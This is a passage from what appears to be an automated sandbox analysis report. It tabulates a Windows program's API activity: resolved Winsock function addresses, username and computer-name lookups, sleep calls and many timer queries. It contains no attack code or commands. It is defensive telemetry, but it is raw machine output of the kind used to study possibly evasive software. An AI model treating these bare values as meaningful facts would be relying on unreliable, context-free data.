| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohl, address_out = 0x746a49d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohs, address_out = 0x746b8ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recv, address_out = 0x746b0c50 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recvfrom, address_out = 0x746ba8b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = select, address_out = 0x746a4ea0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = send, address_out = 0x746a5030 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = sendto, address_out = 0x746a5a20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = setsockopt, address_out = 0x746afd70 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = shutdown, address_out = 0x746b38a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = socket, address_out = 0x746b4510 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyaddr, address_out = 0x746d6b20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyname, address_out = 0x746d6cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobyname, address_out = 0x746d5bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobynumber, address_out = 0x746d5d10 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyname, address_out = 0x746d7020 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyport, address_out = 0x746d7210 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostname, address_out = 0x746d6e60 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getaddrinfo, address_out = 0x746a5810 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = freeaddrinfo, address_out = 0x746a4fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getnameinfo, address_out = 0x746b3560 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Username | user_name_out = FD1HVy |
|
1 |
System (1978)
| Operation | Additional Information | Success | Count | Logfile | |
|---|---|---|---|---|---|
| Get Computer Name | result_out = NQDPDE |
|
1 | ||
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
7 | ||
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
4 | ||
| Sleep | duration = 25 milliseconds (0.025 seconds) |
|
13 | ||
| Sleep | duration = 1500 milliseconds (1.500 seconds) |
|
79 | ||
| Sleep | duration = -1 (infinite) |
|
1 | ||
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
31 | ||
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
1 | ||
| Get Time | type = Performance Ctr, time = 13494153699 |
|
1 | ||
| Get Time | type = Ticks, time = 134906 |
|
2 | ||
| Get Time | type = Local Time, time = 2019-04-17 12:39:42 (Local Time) |
|
4 | ||
| Get Time | type = Performance Ctr, time = 13494199517 |
|
1 | ||
| Get Time | type = Ticks, time = 134937 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 13497421825 |
|
1 | ||
| Get Time | type = Ticks, time = 135078 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 13511462545 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 13868558008 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 13882002155 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 13882013370 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 13882032520 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 13882045703 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 13882057498 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 13882069052 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 13882079383 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 13882279915 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 13993534532 |
|
1 | ||
| Get Time | type = Ticks, time = 139906 |
|
3 | ||
| Get Time | type = Local Time, time = 2019-04-17 12:39:47 (Local Time) |
|
12 | ||
| Get Time | type = System Time |
|
3 | ||
| Get Time | type = Performance Ctr, time = 13993763449 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 13994910104 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 14006448985 |
|
1 | ||
| Get Time | type = Ticks, time = 140031 |
|
3 | ||
| Get Time | type = Performance Ctr, time = 14006863019 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 14006876580 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 15152395334 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 15164921462 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 15164933696 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 15164945711 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 15164957508 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 15164969124 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 15164980935 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 15164992491 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 15165198702 |
|
1 | ||
| Get Time | type = Ticks, time = 169531 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 16957000406 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 16957282267 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 16990506616 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 16990516456 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 16990525964 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 16990535427 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 16990544919 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 16990554335 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 16990563752 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 16990731447 |
|
1 | ||
| Get Time | type = Ticks, time = 169921 |
|
2 | ||
| Get Time | type = Performance Ctr, time = 16996049186 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 16996081333 |
|
1 | ||
| Get Time | type = Ticks, time = 169937 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 16997556707 |
|
1 | ||
| Get Time | type = Ticks, time = 169953 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 16998838701 |
|
1 | ||
| Get Time | type = Ticks, time = 172234 |
|
4 | ||
| Get Time | type = Performance Ctr, time = 17226607075 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17226639721 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17226723854 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17226750655 |
|
1 | ||
| Get Time | type = Ticks, time = 172250 |
|
16 | ||
| Get Time | type = Performance Ctr, time = 17227814078 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17227843568 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17227917429 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17227943869 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228027322 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228053851 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228120487 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228147129 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228213317 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228242837 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228312731 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228345298 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228424681 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228451240 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228527402 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228554074 |
|
1 | ||
| Get Time | type = Ticks, time = 172265 |
|
20 | ||
| Get Time | type = Performance Ctr, time = 17228660975 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228688743 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228754301 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228855329 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228928596 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17228955038 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17229058729 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17229086978 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17229163878 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17229190894 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17229255365 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17229282168 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17229333868 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17229342687 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17229407436 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17229415820 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17229463653 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17229473500 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17229522181 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17229530720 |
|
1 | ||
| Get Time | type = Ticks, time = 172281 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17231433480 |
|
1 | ||
| Get Time | type = Ticks, time = 173781 |
|
8 | ||
| Get Time | type = Performance Ctr, time = 17380454352 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17380464146 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17380523090 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17380532405 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17380580782 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17380589334 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17380654085 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17380662873 |
|
1 | ||
| Get Time | type = Ticks, time = 174125 |
|
2 | ||
| Get Time | type = Performance Ctr, time = 17416095786 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17416105837 |
|
1 | ||
| Get Time | type = Ticks, time = 174140 |
|
6 | ||
| Get Time | type = Performance Ctr, time = 17416178819 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17416187945 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17416253024 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17416261832 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17417002519 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17417012193 |
|
1 | ||
| Get Time | type = Ticks, time = 174375 |
|
18 | ||
| Get Time | type = Performance Ctr, time = 17440239966 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17440253309 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17440334766 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17440345980 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17440599526 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17440612062 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17440686796 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17440698234 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17440764565 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17440775797 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17440844873 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17440857204 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17440919297 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17440930388 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17440999696 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17441011173 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17441088340 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17441099000 |
|
1 | ||
| Get Time | type = Ticks, time = 174390 |
|
22 | ||
| Get Time | type = Performance Ctr, time = 17441566205 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17441578621 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17441650246 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17441661684 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17441728345 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17441739455 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17441805416 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17441817021 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17441884032 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17441895223 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17441957918 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17441969022 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17442053699 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17442064837 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17442129781 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17442140970 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17442204006 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17442215017 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17442299515 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17442310308 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17442371453 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17442383006 |
|
1 | ||
| Get Time | type = Ticks, time = 176125 |
|
31 | ||
| Get Time | type = Performance Ctr, time = 17614757089 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17614770301 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17614861409 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17614873260 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17614942911 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17614954431 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615018935 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615030716 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615110997 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615122547 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615212688 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615224323 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615302333 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615315014 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615390154 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615401644 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615467931 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615479865 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615566544 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615578337 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615653961 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615666184 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615741165 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615753004 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615840857 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615852796 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615943690 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17615955032 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17616030798 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17616042712 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17616117379 |
|
1 | ||
| Get Time | type = Ticks, time = 176140 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17616218482 |
|
1 | ||
| Get Time | type = Ticks, time = 176265 |
|
26 | ||
| Get Time | type = Performance Ctr, time = 17628919501 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17628932197 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629011997 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629023908 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629111012 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629122957 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629191970 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629203802 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629269056 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629280507 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629344971 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629356614 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629444297 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629455704 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629521368 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629533164 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629608497 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629620148 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629686233 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629698173 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629773744 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629785396 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629845508 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629857232 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629904653 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17629913805 |
|
1 | ||
| Get Time | type = Ticks, time = 176281 |
|
12 | ||
| Get Time | type = Performance Ctr, time = 17631360061 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17631369571 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17631420172 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17631428870 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17631497383 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17631506600 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17631553823 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17631562732 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17631617257 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17631625884 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17631681250 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17631689812 |
|
1 | ||
| Get Time | type = Ticks, time = 177968 |
|
2 | ||
| Get Time | type = Performance Ctr, time = 17801137023 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17801151398 |
|
1 | ||
| Get Time | type = Ticks, time = 178187 |
|
10 | ||
| Get Time | type = Performance Ctr, time = 17822885189 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17822897202 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17822950129 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17822959979 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17823025897 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17823036033 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17823097379 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17823107176 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17823160021 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17823170042 |
|
1 | ||
| Get Time | type = Ticks, time = 178937 |
|
12 | ||
| Get Time | type = Performance Ctr, time = 17897542921 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17897558837 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17897631237 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17897643688 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17897705905 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17897717791 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17897779823 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17897790341 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17897849431 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17897858809 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17897906262 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17897915785 |
|
1 | ||
| Get Time | type = Ticks, time = 179187 |
|
10 | ||
| Get Time | type = Performance Ctr, time = 17922200302 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17922213834 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17922286916 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17922298837 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17922355753 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17922366357 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17922420913 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17922430389 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17922476351 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17922485680 |
|
1 | ||
| Get Time | type = Ticks, time = 179203 |
|
2 | ||
| Get Time | type = Performance Ctr, time = 17924972128 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17924987054 |
|
1 | ||
| Get Time | type = Ticks, time = 179218 |
|
5 | ||
| Get Time | type = Performance Ctr, time = 17925193357 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17925211243 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17925293473 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17925306137 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17926631627 |
|
1 | ||
| Get Time | type = Ticks, time = 179234 |
|
17 | ||
| Get Time | type = Performance Ctr, time = 17926656199 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17926726612 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17926739235 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17926837807 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17926853506 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17926925322 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17926938221 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17927002712 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17927014893 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17927083840 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17927097185 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17927161703 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17927174058 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17927239032 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17927251758 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17927319691 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17927331480 |
|
1 | ||
| Get Time | type = Ticks, time = 179421 |
|
2 | ||
| Get Time | type = Performance Ctr, time = 17945364792 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 17945376919 |
|
1 | ||
| Get Time | type = Ticks, time = 181656 |
|
2 | ||
| Get Time | type = Performance Ctr, time = 18169367986 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18169380081 |
|
1 | ||
| Get Time | type = Ticks, time = 182109 |
|
6 | ||
| Get Time | type = Performance Ctr, time = 18214919719 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18214932309 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18214990140 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18215031335 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18215088717 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18215098392 |
|
1 | ||
| Get Time | type = Ticks, time = 182125 |
|
12 | ||
| Get Time | type = Performance Ctr, time = 18215633251 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18215645292 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18215700813 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18215711262 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18216620898 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18216634832 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18216690503 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18216701316 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18216750078 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18216760254 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18216807950 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18216838703 |
|
1 | ||
| Get Time | type = Ticks, time = 182140 |
|
37 | ||
| Get Time | type = Performance Ctr, time = 18216887121 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18216897016 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217222745 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217232987 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217284725 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217295136 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217344961 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217355174 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217408653 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217418283 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217494150 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217503747 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217561653 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217570830 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217616550 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217625748 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217677097 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217686084 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217731721 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217741000 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217795528 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217804767 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217850187 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217859318 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217912025 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18217921863 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218029503 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218039286 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218095729 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218105345 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218152357 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218162439 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218220752 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218232745 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218297770 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218309847 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218377004 |
|
1 | ||
| Get Time | type = Ticks, time = 182156 |
|
29 | ||
| Get Time | type = Performance Ctr, time = 18218438698 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218515780 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218525570 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218574930 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218584992 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218644457 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218653799 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218706778 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218716574 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218775035 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218784650 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218834692 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218844316 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218891188 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218900391 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218954722 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18218964093 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18219012419 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18219022073 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18219074887 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18219084489 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18219158770 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18219168321 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18219218322 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18219227588 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18219286070 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18219296157 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18219352057 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18219362033 |
|
1 | ||
| Get Time | type = Ticks, time = 183671 |
|
2 | ||
| Get Time | type = Performance Ctr, time = 18370597799 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18370610115 |
|
1 | ||
| Get Time | type = Ticks, time = 184593 |
|
6 | ||
| Get Time | type = Performance Ctr, time = 18462778626 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18462791763 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18462849820 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18462859367 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18462910645 |
|
1 | ||
